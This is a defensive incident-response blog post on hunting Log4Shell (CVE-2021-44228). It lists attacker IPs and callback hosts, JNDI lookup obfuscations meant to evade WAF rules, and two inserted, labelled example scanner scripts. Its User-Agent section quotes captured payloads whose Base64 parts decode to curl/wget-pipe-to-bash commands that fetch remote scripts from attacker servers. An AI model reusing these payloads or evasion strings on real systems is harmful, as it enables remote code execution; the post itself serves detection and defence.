Log4j Hunting & Indicators

A summary of the long weekend experienced by thousands of security professionals.

By Joshua Beaman
Founder & Lead Trainer at SBT
Incident Responder at ASOS.com

The purpose of this page is to assist defenders with the ongoing global incident surrounding the Log4j unauthenticated remote code execution (RCE) vulnerability. This page contains the following sections: Summary of Log4j ("Log4Shell", CVE-2021-44228), Log4j Exploitation, Hunting Tips, Source IP Indicators, Payload Indicators, User-Agent Indicators, Sources, and Closing Note.

Summary of Log4j or "Log4Shell", CVE-2021-44228

  • National Vulnerability Database entry
  • CVE Details entry
  • Vendor (Apache) advisory
  • CISA advisory
  • NCSC advisory

The Apache Software Foundation has released a security advisory to address a remote code execution vulnerability (CVE-2021-44228) affecting Log4j versions 2.0-beta9 to 2.14.1. A remote, unauthenticated attacker could exploit this vulnerability via a single request to take control of an affected system by executing code. Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services.

The Log4j 2 library is included in Apache frameworks such as:

  • Apache Struts2
  • Apache Solr
  • Apache Druid
  • Apache Flink
  • Apache Swift

If you are using the Log4j 2 library as a dependency within an application that has been developed in-house, ensure you update to version 2.15.0-rc-2 or later (NOT 2.15.0 as previously thought) to mitigate the vulnerability.

Communicating with third-parties/vendors to confirm their acknowledgement of CVE-2021-44228 and if they are affected, as well as patching timelines, will help with scoping the attack surface. If you are using an affected third-party application, ensure you keep the product updated to the latest version.

The flaw can also be mitigated in previous releases (2.10 and later) by setting system property “log4j2.formatMsgNoLookups” to “true” or removing the JndiLookup class from the classpath.
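As an added example (not the author's or Apache's code), the script below does the two checks the paragraphs above call for on an in-house application's dependencies: it reads the bundled log4j-core version from the jar's Maven pom.properties and tests it against the advisory range 2.0-beta9 to 2.14.1, and it checks whether JndiLookup.class is still inside the jar, i.e. whether the class-removal mitigation has been applied. The class path and pom.properties path are the standard ones shipped in log4j-core; the sample jars are constructed in a temporary directory with placeholder bytes so the script runs offline, and demo() and the fixture file names are assumptions of this example. The range check follows the advisory's published version range only and does not distinguish 2.15.0 release candidates, so the rc-2 note above still has to be applied by hand.

```python
"""Inventory jars, read the log4j-core version and check for JndiLookup.class.
Added example: constructed fixtures, not the page's or Apache's code."""
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
VERSION_RE = re.compile(r"^version=(.+)$", re.MULTILINE)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0); '2.15.0-rc-2' -> (2, 15, 0).
    Numeric components only, stopping at the first non-numeric part."""
    nums = []
    for part in re.split(r"[.\-]", text):
        if not part.isdigit():
            break
        nums.append(int(part))
    return tuple(nums)


def inspect_jar(path):
    """Describe one jar; returns None if it carries no log4j-core markers at all."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            m = VERSION_RE.search(zf.read(POM_PROPS).decode("utf-8", "replace"))
            if m:
                version = m.group(1).strip()
    if version is None and JNDI_CLASS not in names:
        return None
    ver = parse_version(version) if version else ()
    # Advisory range is 2.0-beta9 to 2.14.1: treat the whole 2.x line below
    # 2.15 as in range (2.0-beta8 and earlier get flagged too, erring on review).
    in_range = bool(ver) and (2, 0) <= ver < (2, 15)
    return {
        "jar": str(path),
        "version": version,
        "in_vulnerable_range": in_range,
        "jndi_lookup_present": JNDI_CLASS in names,
        # Action needed when a vulnerable version still ships the class, or when
        # the class is present but no version could be read (shaded/fat jars).
        "needs_action": JNDI_CLASS in names and (in_range or version is None),
    }


def scan_tree(root):
    """Walk a directory for *.jar files and return findings sorted by path.
    Nested jars inside .war/.ear archives are not opened by this example."""
    results = []
    for jar in sorted(Path(root).rglob("*.jar")):
        try:
            info = inspect_jar(jar)
        except zipfile.BadZipFile:
            continue
        if info:
            results.append(info)
    return results


def make_sample_jar(directory, version, include_jndi=True):
    """Constructed fixture: a minimal fake log4j-core jar, no real bytecode."""
    path = Path(directory) / f"log4j-core-{version}.jar"
    with zipfile.ZipFile(path, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a class
    return path


def demo():
    """Three constructed cases: unpatched 2.14.1, 2.14.1 with JndiLookup removed,
    and 2.15.0-rc-2 as the fixed release."""
    with tempfile.TemporaryDirectory() as tmp:
        for sub, version, keep_class in (("a", "2.14.1", True),
                                         ("b", "2.14.1", False),
                                         ("c", "2.15.0-rc-2", True)):
            d = Path(tmp) / sub
            d.mkdir()
            make_sample_jar(d, version, keep_class)
        return scan_tree(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point scan_tree at an application's lib directory (or a whole host) to get the list; only the first fixture, the unpatched 2.14.1 jar that still contains JndiLookup.class, comes back with needs_action set.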

If a system is showing indicators of successful exploitation, standard digital forensics and incident response practices should be utilised to contain, analyse, and eradicate any malicious foothold.

Log4j Exploitation

I have primarily seen four approaches to execution, including the standard format. Real-world examples can be found in the User-Agent Indicators section.

  • Standard/Initial Format:
    ${jndi:ldap://IPAddress:Port/Basic/Command/Base64/EncodedCommandHere=}
  • Lowercase/Uppercase Lookups:
    i. “${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}:”
    ii. “${${upper:j}ndi:${upper:l}${upper:d}a${a}a${lower:p}:”
  • Utilising System Environment Variables:
    “${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}”
    If there is no ENV_NAME environment variable, Log4j substitutes the default text after :-, so the string still resolves to jndi:ldap.
  • ::- Notations:
    “${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:”
Image credit: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

Hunting Tips

  • A quick win is to look for User-Agents that start with “${jndi”, as this is a commonality we’ve seen across public and private reporting. Examples are shown in the User-Agent Indicators section of this page.
  • With the above, HTTP 200s could show successful exploitation activity (provided the end system is actually vulnerable; a 200 only confirms the request was served, not that the lookup fired). Other status codes such as 500, 404, etc. could help you collect source IP indicators for blocking.
  • If you have access to dirty machines, when looking at requests that attempt to drop files onto the victim system, you can curl the payload URL. This can help with intelligence gathering such as file name, hash, size, and contents. Using yarGen to create YARA rules could be useful for further hunting to identify any occurrences of the file inside your environment.
  • Security Operations teams should be focusing harder than ever on SIEM/EDR/other alerts, as these could be indicators of actions-on-objectives as a result of successful log4j exploitation.
  • Contact 3rd-party services utilised by your organisation to understand if their products or services are affected by the vulnerability, and what their remediation timelines are. You can cross off services/products that aren’t affected or have been patched, and remove them from the scope.
  • Use the below list of Source IP Indicators to look for incoming traffic from scanning/exploitation IPs in your perimeter firewall, WAF, proxy, or system logs.
  • Use the below list of Payload Indicators to look for outbound connections to these IPs/domains in your perimeter firewall, EDR, proxy, or system logs.
  • Actors are finding new ways to obfuscate the standard “${jndi:ldap” string to bypass WAF rules. Review your logs to identify new variants being used, such as “${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}:” – naughty, right?
  • If your systems have Sysmon logging and you use Microsoft Defender, try out the Advanced Hunting queries provided in this article.
  • Use the following grep/zgrep commands by Florian Roth to hunt for exploitation activity in /var/log and sub-locations.
  • A vast amount of IOCs have been consolidated in one GitHub page here.
  • Snort and Suricata rules for Log4j can be downloaded here.
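The script below is an added example, not code from the original page or from Florian Roth's grep commands, that ties the Log4j Exploitation section and the hunting tips above together in one pass over access logs. It normalises the four lookup obfuscations listed above (${lower:}, ${upper:}, ${::-x} and ${env:NAME:-x}) so a hidden “${jndi:” surfaces, flags requests whose path, Referer or User-Agent carries a jndi lookup after normalisation, pulls out the callback host:port and any /Basic/Command/Base64/ payload for intelligence gathering, and buckets source IPs by HTTP status (200 = possible hit, others = block-list candidates). The sample log lines are constructed in combined log format; their source IPs and callback hosts are taken from the indicator lists on this page (with the [.] sanitisation removed), the Base64 command is a harmless placeholder, and the function names are this example's own. Environment-variable lookups are resolved to their default value without consulting the real environment, and unresolvable lookups such as ${hostName} are kept as a <hostName> marker.

```python
"""Triage Log4Shell probes in web-server access logs.
Added example with constructed sample lines; not the page's own code."""
import base64
import re
from collections import defaultdict

LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")          # innermost ${...} only
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
CALLBACK_RE = re.compile(r"jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)
B64_CMD_RE = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")
LOG_RE = re.compile(                                  # Apache/nginx "combined"
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def _resolve(inner):
    """Evaluate one innermost lookup for the forms used to disguise "jndi"."""
    if ":" not in inner:
        return "<" + inner + ">"            # e.g. ${hostName}: cannot resolve here
    kind, _, rest = inner.partition(":")
    kind = kind.lower()
    if kind == "lower":
        return rest.lower()
    if kind == "upper":
        return rest.upper()
    if kind != "jndi" and ":-" in rest:     # ${::-j} or ${env:UNSET:-j}: default wins
        return rest.split(":-", 1)[1]
    return "${" + inner + "}"               # jndi itself or unknown kind: leave as-is


def normalise(text, max_rounds=20):
    """Resolve innermost lookups repeatedly until nothing changes."""
    for _ in range(max_rounds):
        new = LOOKUP_RE.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def decode_command(text):
    """Decoded /Basic/Command/Base64/<...> segment, or None if absent/invalid."""
    m = B64_CMD_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:                      # binascii.Error is a ValueError
        return None


def analyse_line(line):
    """Finding dict for a probe line, None for a clean or unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    raw = " ".join((m["request"], m["referer"], m["ua"]))
    norm = normalise(raw)
    if not JNDI_RE.search(norm):
        return None
    cb = CALLBACK_RE.search(norm)
    return {
        "src_ip": m["ip"],
        "status": int(m["status"]),
        "obfuscated": norm != raw,          # True when lookups hid the string
        "callback": f"{cb.group(1).lower()}://{cb.group(2)}" if cb else None,
        "command": decode_command(norm),
    }


def hunt(log_text):
    """All findings plus source IPs grouped by status (200 = possible hit)."""
    findings = [f for f in map(analyse_line, log_text.splitlines()) if f]
    by_status = defaultdict(set)
    for f in findings:
        by_status[f["status"]].add(f["src_ip"])
    return findings, {k: sorted(v) for k, v in by_status.items()}


# Constructed sample log: indicator IPs/hosts from this page, placeholder command.
_FAKE_CMD = base64.b64encode(b"echo constructed-sample").decode()
SAMPLE_LOG = "\n".join([
    '10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET /index.html HTTP/1.1" 200 612 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '45.155.205.233 - - [11/Dec/2021:03:15:22 +0000] "GET / HTTP/1.1" 200 612 "-" '
    '"${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/' + _FAKE_CMD + '}"',
    '185.220.101.34 - - [11/Dec/2021:03:16:01 +0000] "GET / HTTP/1.1" 404 153 "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}'
    '.c6qgldh5g22l07bu1lvgcg4uhtoy81emy.interactsh.com}"',
    '45.153.160.2 - - [11/Dec/2021:03:17:45 +0000] "GET /${jndi:${lower:l}${lower:d}'
    'a${lower:p}://world80.log4j.binaryedge.io:80/callback} HTTP/1.1" 500 0 "-" '
    '"curl/7.68.0"',
])

if __name__ == "__main__":
    findings, by_status = hunt(SAMPLE_LOG)
    for f in findings:
        print(f)
    print("source IPs by status:", by_status)
```

Feed hunt() the contents of access logs (or zcat rotated ones into it) and the by_status map gives you the 200s to investigate first and the rest as source IP candidates; the callback field feeds the outbound-connection search from the tip above, and command shows what the Base64 segment would have run on a vulnerable host.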

Source IP Indicators

The following source IPs are related to resources that are conducting log4j vulnerability identification scanning and exploitation. Different IPs may be used to host payloads or act as call-back servers to listen for vulnerable systems identified during reconnaissance. SBT cannot confirm the quality of these indicators, so do not block them outright, do your own reputation checks.

1.14.17.89
1.116.59.211
1.209.249.188
5.157.38.50
5.182.210.216
5.199.143.202
18.27.197.252
18.204.199.0
20.71.156.146
20.205.104.227
23.120.182.121
23.129.64.131
23.129.64.135
23.129.64.139
23.129.64.141
23.129.64.145
23.129.64.146
23.129.64.148
23.154.177.2
23.154.177.7
34.124.226.216
34.247.50.189
35.170.71.122
37.19.212.104
37.123.163.58
45.12.134.108
45.13.104.179
45.33.120.240
45.137.21.9
45.153.160.2
45.153.160.130
45.153.160.131
45.153.160.133
45.153.160.134
45.153.160.135
45.153.160.136
45.153.160.138
45.154.255.147
45.155.205.233
46.105.95.220
46.166.139.111
46.182.21.248
51.15.43.205
51.15.76.60
51.77.52.216
51.255.106.85
54.173.99.121
60.31.180.149
61.19.25.207
62.76.41.46
62.102.148.68
62.102.148.69
62.171.142.3
64.113.32.29
66.220.242.222
68.79.17.59
68.183.2.123
68.183.44.143
68.183.198.247
72.223.168.73
81.6.43.167
81.17.18.60
81.17.18.61
81.17.18.62
82.221.131.71
88.80.20.86
89.163.154.91
89.163.252.230
89.249.63.3
91.203.5.146
91.219.237.21
91.245.81.65
94.142.241.194
94.230.208.147
95.101.91.92
101.35.154.34
103.90.239.209
103.103.0.141
103.103.0.142
103.214.5.13
104.244.72.7
104.244.72.115
104.244.72.129
104.244.73.43
104.244.74.57
104.244.74.211
104.244.75.74
104.244.76.13
104.244.76.170
104.244.76.173
104.244.77.235
104.244.78.213
104.244.79.6
107.189.1.160
107.189.1.178
107.189.6.166
107.189.8.65
107.189.10.137
107.189.11.153
107.189.12.135
107.189.14.76
107.189.14.98
107.189.14.182
107.189.28.84
107.189.29.41
107.189.29.107
107.189.31.241
109.70.100.26
109.70.100.27
109.70.100.28
109.70.100.34
109.70.100.36
109.237.96.124
116.24.67.213
121.4.56.143
121.5.219.20
122.161.50.23
122.161.53.44
133.18.201.195
134.56.204.191
134.122.34.28
135.148.43.32
137.184.28.58
137.184.96.216
137.184.98.176
137.184.99.8
137.184.102.82
137.184.104.73
137.184.106.119
137.184.111.180
138.68.167.19
138.197.167.229
139.59.8.39
140.246.171.141
142.93.34.250
142.93.36.237
142.93.148.12
142.93.151.166
142.93.157.150
143.110.221.204
143.198.32.72
143.198.45.117
145.220.24.19
146.56.131.161
147.182.131.229
147.182.150.124
147.182.154.100
147.182.167.165
147.182.169.254
147.182.199.94
147.182.213.12
147.182.219.9
150.158.189.96
151.80.148.159
151.115.60.113
157.230.32.67
157.245.109.75
159.65.3.102
159.65.58.66
159.65.146.60
159.65.155.208
159.65.175.123
159.65.194.103
159.89.113.255
159.89.180.119
159.223.9.17
159.223.61.102
159.223.81.193
161.35.119.60
162.247.74.202
164.90.199.216
164.92.254.33
165.227.37.189
167.71.1.144
167.71.13.196
167.99.164.160
167.99.164.201
167.99.172.58
167.99.172.213
167.99.204.151
167.99.221.249
170.210.45.163
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
172.106.17.218
175.6.210.66
176.10.99.200
176.10.104.240
178.17.171.102
178.17.171.150
178.20.55.16
178.62.23.146
178.62.79.49
178.176.202.121
178.176.203.190
179.43.187.138
181.214.39.2
185.4.132.183
185.10.68.168
185.14.97.147
185.38.175.130
185.38.175.131
185.38.175.132
185.56.80.65
185.83.214.69
185.100.86.128
185.100.87.41
185.100.87.202
185.107.47.171
185.107.47.215
185.107.70.56
185.129.61.1
185.129.61.4
185.130.44.108
185.165.168.77
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.243
185.220.100.244
185.220.100.245
185.220.100.246
185.220.100.247
185.220.100.248
185.220.100.249
185.220.100.250
185.220.100.251
185.220.100.252
185.220.100.253
185.220.100.254
185.220.100.255
185.220.101.32
185.220.101.33
185.220.101.34
185.220.101.35
185.220.101.36
185.220.101.37
185.220.101.38
185.220.101.39
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.44
185.220.101.45
185.220.101.46
185.220.101.48
185.220.101.49
185.220.101.50
185.220.101.51
185.220.101.52
185.220.101.53
185.220.101.54
185.220.101.55
185.220.101.56
185.220.101.57
185.220.101.58
185.220.101.60
185.220.101.61
185.220.101.62
185.220.101.63
185.220.101.129
185.220.101.131
185.220.101.132
185.220.101.133
185.220.101.134
185.220.101.135
185.220.101.138
185.220.101.139
185.220.101.140
185.220.101.141
185.220.101.142
185.220.101.143
185.220.101.144
185.220.101.145
185.220.101.146
185.220.101.147
185.220.101.148
185.220.101.149
185.220.101.150
185.220.101.151
185.220.101.152
185.220.101.153
185.220.101.154
185.220.101.155
185.220.101.156
185.220.101.157
185.220.101.158
185.220.101.159
185.220.101.160
185.220.101.161
185.220.101.162
185.220.101.163
185.220.101.164
185.220.101.165
185.220.101.167
185.220.101.168
185.220.101.169
185.220.101.170
185.220.101.171
185.220.101.172
185.220.101.173
185.220.101.174
185.220.101.175
185.220.101.176
185.220.101.177
185.220.101.178
185.220.101.179
185.220.101.180
185.220.101.181
185.220.101.182
185.220.101.183
185.220.101.184
185.220.101.185
185.220.101.186
185.220.101.187
185.220.101.188
185.220.101.189
185.220.101.190
185.220.101.191
185.220.102.7
185.220.102.8
185.220.102.241
185.220.102.242
185.220.102.246
185.220.102.249
185.220.102.250
185.220.102.252
185.220.102.253
185.220.102.254
185.220.103.4
185.220.103.7
185.220.103.119
185.232.23.46
188.166.48.55
188.166.74.97
188.166.92.228
188.166.122.43
188.166.223.38
191.232.38.25
193.31.24.154
193.110.95.34
193.189.100.195
193.189.100.201
193.189.100.203
193.218.118.183
193.218.118.231
194.48.199.78
194.135.33.152
194.163.44.188
194.163.163.20
195.19.192.26
195.123.247.209
195.176.3.19
195.176.3.23
195.176.3.24
195.206.105.217
195.251.41.139
195.254.135.76
197.246.171.83
197.246.171.111
198.98.51.189
198.98.60.19
199.195.250.77
204.8.156.142
205.185.117.149
206.189.20.141
207.180.202.75
209.127.17.234
209.127.17.242
209.141.41.103
209.141.45.189
209.141.45.227
211.154.194.21
212.192.246.95
212.193.30.142
212.193.57.225
213.202.216.189
221.199.187.100

Payload Indicators

92.242.40[.]21:1534

SINKHOLE: http://kryptoslogic-cve-2021-44228[.]com

45.130.229[.]168:1389

92.242.40[.]21:5557

82.118.18[.]201:1534

dc13cc43.probe001.log4j.leakix[.]net:9200

c6qgldh5g22l07bu1lvgcg4uhtoy81emy.interactsh[.]com

45.155.205[.]233:12344


User-Agent Indicators

Please note that some indicators have been sanitised (using [.] on the last octet of IPs, or the TLD of domains) to prevent automatic hyperlinking. Ensure this is removed before running searches to retrieve accurate results.

${jndi:ldap://92.242.40[.]21:1534/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5Mi4yNDIuNDAuMjEvbGguc2gpfGJhc2g=}

${jndi:${lower:l}${lower:d}a${lower:p}://sc${upper:a}n-one.research.billdemirkapi[.]me:1389/a}

${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228[.]com/http443useragent}

/${jndi:ldap://45.130.229[.]168:1389/Exploit}

${jndi:ldap://92.242.40[.]21:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5Mi4yNDIuNDAuMjEvbGguc2gpfGJhc2g=}

${jndi:ldap://82.118.18[.]201:1534/Basic/Command/Base64/KGN1cmwgLXMgODIuMTE4LjE4LjIwMS9saC5zaHx8d2dldCAtcSAtTy0gODIuMTE4LjE4LjIwMS9saC5zaCl8YmFzaA==}

${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j[.]bin${upper:a}ryedge[.]io:80/callback}

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j[.]bin${upper:a}ryedge[.]io:80/callback}

${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228[.]com/http80useragent}

${jndi:ldaps://dc13cc43.probe001.log4j.leakix[.]net:9200/b}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6qgldh5g22l07bu1lvgcg4uhtoy81emy.interactsh[.]com}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC41NC45Ni4xNDc6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzIwLjU0Ljk2LjE0Nzo0NDMpfGJhc2g=}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC41NC45Ni4xNTY6NDQzfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzIwLjU0Ljk2LjE1Njo0NDMpfGJhc2g=}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43NC4xOC44Mzo0NDN8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTMuNzQuMTguODM6NDQzKXxiYXNo}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC41NC45Ni4xNTY6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjAuNTQuOTYuMTU2OjgwKXxiYXNo}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMC41NC45Ni4xNDc6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjAuNTQuOTYuMTQ3OjgwKXxiYXNo}

${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205[.]233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43NC4xOC44Mzo4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8xMy43NC4xOC44Mzo4MCl8YmFzaA==}

Sources

Closing Note

If you enjoyed this post, please consider following me on LinkedIn. A big shout out to the security teams and incident responders around the world that have been dealing with this mess since Friday – good luck to you all.